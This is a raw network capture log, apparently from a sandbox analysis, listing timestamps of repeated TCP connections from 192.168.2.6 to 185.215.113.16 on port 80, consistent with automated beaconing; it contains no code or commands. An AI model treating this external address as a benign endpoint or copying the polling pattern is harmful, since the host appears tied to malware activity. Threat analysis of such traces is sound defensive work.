                  Sep 26, 2024 18:29:13.352613926 CEST4972980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:13.357894897 CEST8049729185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:13.581979036 CEST8049729185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:13.582057953 CEST4972980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:13.684853077 CEST4972980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:13.685236931 CEST4973080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:13.693380117 CEST8049729185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:13.693392992 CEST8049730185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:13.693463087 CEST4972980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:13.693511009 CEST4973080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:13.693623066 CEST4973080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:13.699197054 CEST8049730185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:14.480070114 CEST8049730185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:14.480283976 CEST4973080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:14.480901957 CEST4973080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:14.487703085 CEST8049730185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:14.717986107 CEST8049730185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:14.718044996 CEST4973080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:14.825572968 CEST4973080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:14.825840950 CEST4973180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:14.847107887 CEST8049731185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:14.847290993 CEST4973180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:14.847330093 CEST4973180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:14.847551107 CEST8049730185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:14.847601891 CEST4973080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:14.852680922 CEST8049731185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:15.571053028 CEST8049731185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:15.571253061 CEST4973180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:15.572169065 CEST4973180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:15.577330112 CEST8049731185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:15.804568052 CEST8049731185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:15.804819107 CEST4973180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:15.919186115 CEST4973180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:15.919545889 CEST4973280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:15.926763058 CEST8049732185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:15.926832914 CEST4973280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:15.926969051 CEST4973280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:15.929075003 CEST8049731185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:15.929132938 CEST4973180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:15.933978081 CEST8049732185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:16.653939962 CEST8049732185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:16.654148102 CEST4973280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:16.654900074 CEST4973280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:16.660229921 CEST8049732185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:16.881238937 CEST8049732185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:16.881344080 CEST4973280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:16.997498989 CEST4973280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:16.998038054 CEST4973380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:17.004578114 CEST8049733185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:17.004651070 CEST4973380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:17.004812002 CEST4973380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:17.005757093 CEST8049732185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:17.005827904 CEST4973280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:17.010277987 CEST8049733185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:17.728404999 CEST8049733185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:17.728560925 CEST4973380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:17.729402065 CEST4973380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:17.737950087 CEST8049733185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:17.971012115 CEST8049733185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:17.971127987 CEST4973380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:18.078527927 CEST4973380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:18.078891993 CEST4973480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:18.086524010 CEST8049734185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:18.086591005 CEST4973480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:18.086746931 CEST4973480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:18.087620974 CEST8049733185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:18.087682009 CEST4973380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:18.092941999 CEST8049734185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:18.797792912 CEST8049734185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:18.797981024 CEST4973480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:18.806365013 CEST4973480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:18.828278065 CEST8049734185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:19.049438000 CEST8049734185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:19.049611092 CEST4973480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:19.165424109 CEST4973480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:19.166315079 CEST4973580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:19.174355984 CEST8049735185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:19.174506903 CEST4973580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:19.174683094 CEST4973580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:19.180918932 CEST8049734185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:19.181024075 CEST4973480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:19.181303024 CEST8049735185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:19.901345968 CEST8049735185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:19.901496887 CEST4973580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:19.902298927 CEST4973580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:19.912622929 CEST8049735185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:20.134442091 CEST8049735185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:20.134593010 CEST4973580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:20.249525070 CEST4973580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:20.249867916 CEST4973680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:20.278122902 CEST8049736185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:20.278215885 CEST4973680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:20.278815031 CEST4973680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:20.288434029 CEST8049735185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:20.288536072 CEST4973580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:20.291246891 CEST8049736185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:21.052167892 CEST8049736185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:21.052289009 CEST4973680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:21.053067923 CEST4973680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:21.064383030 CEST8049736185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:21.290230036 CEST8049736185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:21.290306091 CEST4973680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:21.404299021 CEST4973680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:21.404866934 CEST4973780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:21.431756973 CEST8049737185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:21.431930065 CEST4973780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:21.431972027 CEST8049736185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:21.432045937 CEST4973680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:21.432295084 CEST4973780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:21.437967062 CEST8049737185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:22.162587881 CEST8049737185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:22.162810087 CEST4973780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:22.163767099 CEST4973780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:22.169615984 CEST8049737185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:22.435724974 CEST8049737185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:22.436100960 CEST4973780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:22.546247959 CEST4973780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:22.546736002 CEST4973880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:22.554016113 CEST8049737185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:22.554121971 CEST4973780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:22.554683924 CEST8049738185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:22.554810047 CEST4973880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:22.555008888 CEST4973880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:22.577647924 CEST8049738185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:23.290199995 CEST8049738185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:23.290363073 CEST4973880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:23.296442986 CEST4973880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:23.302946091 CEST8049738185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:23.525418997 CEST8049738185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:23.525593996 CEST4973880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:23.643661022 CEST4973880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:23.644031048 CEST4973980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:23.673084974 CEST8049739185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:23.673222065 CEST4973980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:23.673394918 CEST4973980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:23.683264971 CEST8049738185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:23.683280945 CEST8049739185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:23.683353901 CEST4973880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.420269012 CEST8049739185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:24.420348883 CEST4973980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.536663055 CEST4973980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.549959898 CEST8049739185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:24.802232981 CEST8049739185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:24.802325964 CEST4973980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.903702974 CEST4973980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.904067993 CEST4974080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.933105946 CEST8049739185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:24.933120966 CEST8049740185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:24.933223009 CEST4973980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.933288097 CEST4974080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.933429956 CEST4974080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:24.944477081 CEST8049740185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:25.663999081 CEST8049740185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:25.664067030 CEST4974080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:25.664874077 CEST4974080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:25.669975042 CEST8049740185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:25.897031069 CEST8049740185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:25.897119999 CEST4974080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:26.013118982 CEST4974080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:26.013495922 CEST4974180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:26.021739006 CEST8049741185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:26.021862984 CEST4974180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:26.021989107 CEST4974180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:26.022800922 CEST8049740185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:26.022866011 CEST4974080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:26.027209044 CEST8049741185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:26.732294083 CEST8049741185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:26.732378960 CEST4974180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:26.733172894 CEST4974180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:26.738898993 CEST8049741185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:26.962781906 CEST8049741185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:26.962892056 CEST4974180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:27.075694084 CEST4974180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:27.076086998 CEST4974280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:27.081084967 CEST8049741185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:27.081152916 CEST4974180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:27.081253052 CEST8049742185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:27.081312895 CEST4974280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:27.081470966 CEST4974280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:27.086656094 CEST8049742185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:27.803015947 CEST8049742185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:27.803163052 CEST4974280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:27.804039001 CEST4974280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:27.808970928 CEST8049742185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:28.034357071 CEST8049742185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:28.034468889 CEST4974280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:28.138343096 CEST4974280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:28.138531923 CEST4974380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:28.144078016 CEST8049742185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:28.144156933 CEST4974280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:28.144929886 CEST8049743185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:28.145010948 CEST4974380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:28.145132065 CEST4974380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:28.149971008 CEST8049743185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:28.856002092 CEST8049743185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:28.856128931 CEST4974380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:28.857063055 CEST4974380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:28.861855030 CEST8049743185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:29.083080053 CEST8049743185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:29.083190918 CEST4974380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:29.255023956 CEST4974380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:29.255707979 CEST4974480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:29.260158062 CEST8049743185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:29.260232925 CEST4974380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:29.260531902 CEST8049744185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:29.260597944 CEST4974480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:29.261415958 CEST4974480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:29.266726971 CEST8049744185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:29.961617947 CEST8049744185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:29.961729050 CEST4974480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:29.963866949 CEST4974480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:29.968734980 CEST8049744185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:30.191232920 CEST8049744185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:30.191317081 CEST4974480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:30.294405937 CEST4974480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:30.294748068 CEST4974680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:30.299664021 CEST8049746185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:30.299678087 CEST8049744185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:30.299772978 CEST4974680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:30.299777031 CEST4974480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:30.299949884 CEST4974680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:30.304878950 CEST8049746185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:31.020965099 CEST8049746185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:31.021019936 CEST4974680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:31.021889925 CEST4974680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:31.026767015 CEST8049746185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:31.246807098 CEST8049746185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:31.247041941 CEST4974680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:31.357167006 CEST4974680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:31.357800007 CEST4974780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:31.362435102 CEST8049746185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:31.362688065 CEST8049747185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:31.362777948 CEST4974680192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:31.362879038 CEST4974780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:31.363454103 CEST4974780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:31.368345022 CEST8049747185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:32.052800894 CEST8049747185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:32.052903891 CEST4974780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:32.053829908 CEST4974780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:32.058851004 CEST8049747185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:32.276709080 CEST8049747185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:32.276838064 CEST4974780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:32.388500929 CEST4974780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:32.388885021 CEST4974880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:32.393942118 CEST8049748185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:32.394072056 CEST4974880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:32.394089937 CEST8049747185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:32.394150972 CEST4974780192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:32.394277096 CEST4974880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:32.399065018 CEST8049748185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:33.131731033 CEST8049748185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:33.131889105 CEST4974880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:33.132818937 CEST4974880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:33.137630939 CEST8049748185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:33.369824886 CEST8049748185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:33.369930983 CEST4974880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:33.482052088 CEST4974880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:33.482482910 CEST4974980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:33.487317085 CEST8049749185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:33.487428904 CEST4974980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:33.487435102 CEST8049748185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:33.487492085 CEST4974880192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:33.487636089 CEST4974980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:33.492433071 CEST8049749185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:34.185514927 CEST8049749185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:34.185595036 CEST4974980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:34.603547096 CEST4974980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:34.608366013 CEST8049749185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:34.830221891 CEST8049749185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:34.830295086 CEST4974980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:34.935337067 CEST4974980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:34.935705900 CEST4975080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:34.940536022 CEST8049749185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:34.940634012 CEST4974980192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:34.941025972 CEST8049750185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:34.941106081 CEST4975080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:34.941252947 CEST4975080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:34.946259022 CEST8049750185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:35.641802073 CEST8049750185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:35.641976118 CEST4975080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:35.642966986 CEST4975080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:35.647855997 CEST8049750185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:35.866833925 CEST8049750185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:35.866899967 CEST4975080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:35.981966972 CEST4975080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:35.982330084 CEST4975180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:36.258162975 CEST8049751185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:36.258220911 CEST8049750185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:36.258361101 CEST4975180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:36.258529902 CEST4975080192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:36.258687019 CEST4975180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:36.263722897 CEST8049751185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:37.126147985 CEST8049751185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:37.129421949 CEST4975180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:37.132106066 CEST4975180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:37.136895895 CEST8049751185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:37.368777990 CEST8049751185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:37.368901014 CEST4975180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:37.481903076 CEST4975180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:37.482222080 CEST4975280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:37.487590075 CEST8049752185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:37.487663984 CEST8049751185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:37.487700939 CEST4975280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:37.487736940 CEST4975180192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:37.487869978 CEST4975280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:37.493422031 CEST8049752185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:38.355880976 CEST8049752185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:38.355988979 CEST4975280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:38.359211922 CEST4975280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:38.364073992 CEST8049752185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:38.586429119 CEST8049752185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:38.586565971 CEST4975280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:38.700783014 CEST4975280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:38.701178074 CEST4975380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:38.706163883 CEST8049752185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:38.706248999 CEST8049753185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:38.706264019 CEST4975280192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:38.706346035 CEST4975380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:38.706530094 CEST4975380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:38.711791039 CEST8049753185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:39.415940046 CEST8049753185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:39.416029930 CEST4975380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:39.416851997 CEST4975380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:39.421701908 CEST8049753185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:39.646142960 CEST8049753185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:39.646249056 CEST4975380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:39.747596025 CEST4975380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:39.747972965 CEST4975480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:39.752815962 CEST8049754185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:39.752914906 CEST8049753185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:39.752914906 CEST4975480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:39.752969980 CEST4975380192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:39.753189087 CEST4975480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:39.757972956 CEST8049754185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:40.447009087 CEST8049754185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:40.447108030 CEST4975480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:40.447995901 CEST4975480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:40.452814102 CEST8049754185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:40.870287895 CEST8049754185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:40.870620966 CEST4975480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:40.981801033 CEST4975480192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:40.982172966 CEST4975580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:41.217422962 CEST8049755185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:41.217567921 CEST4975580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:41.217859030 CEST4975580192.168.2.6185.215.113.16
                  Sep 26, 2024 18:29:41.222835064 CEST8049755185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:41.223038912 CEST8049754185.215.113.16192.168.2.6
                  Sep 26, 2024 18:29:41.223109007 CEST4975480192.168.2.6185.215.113.16
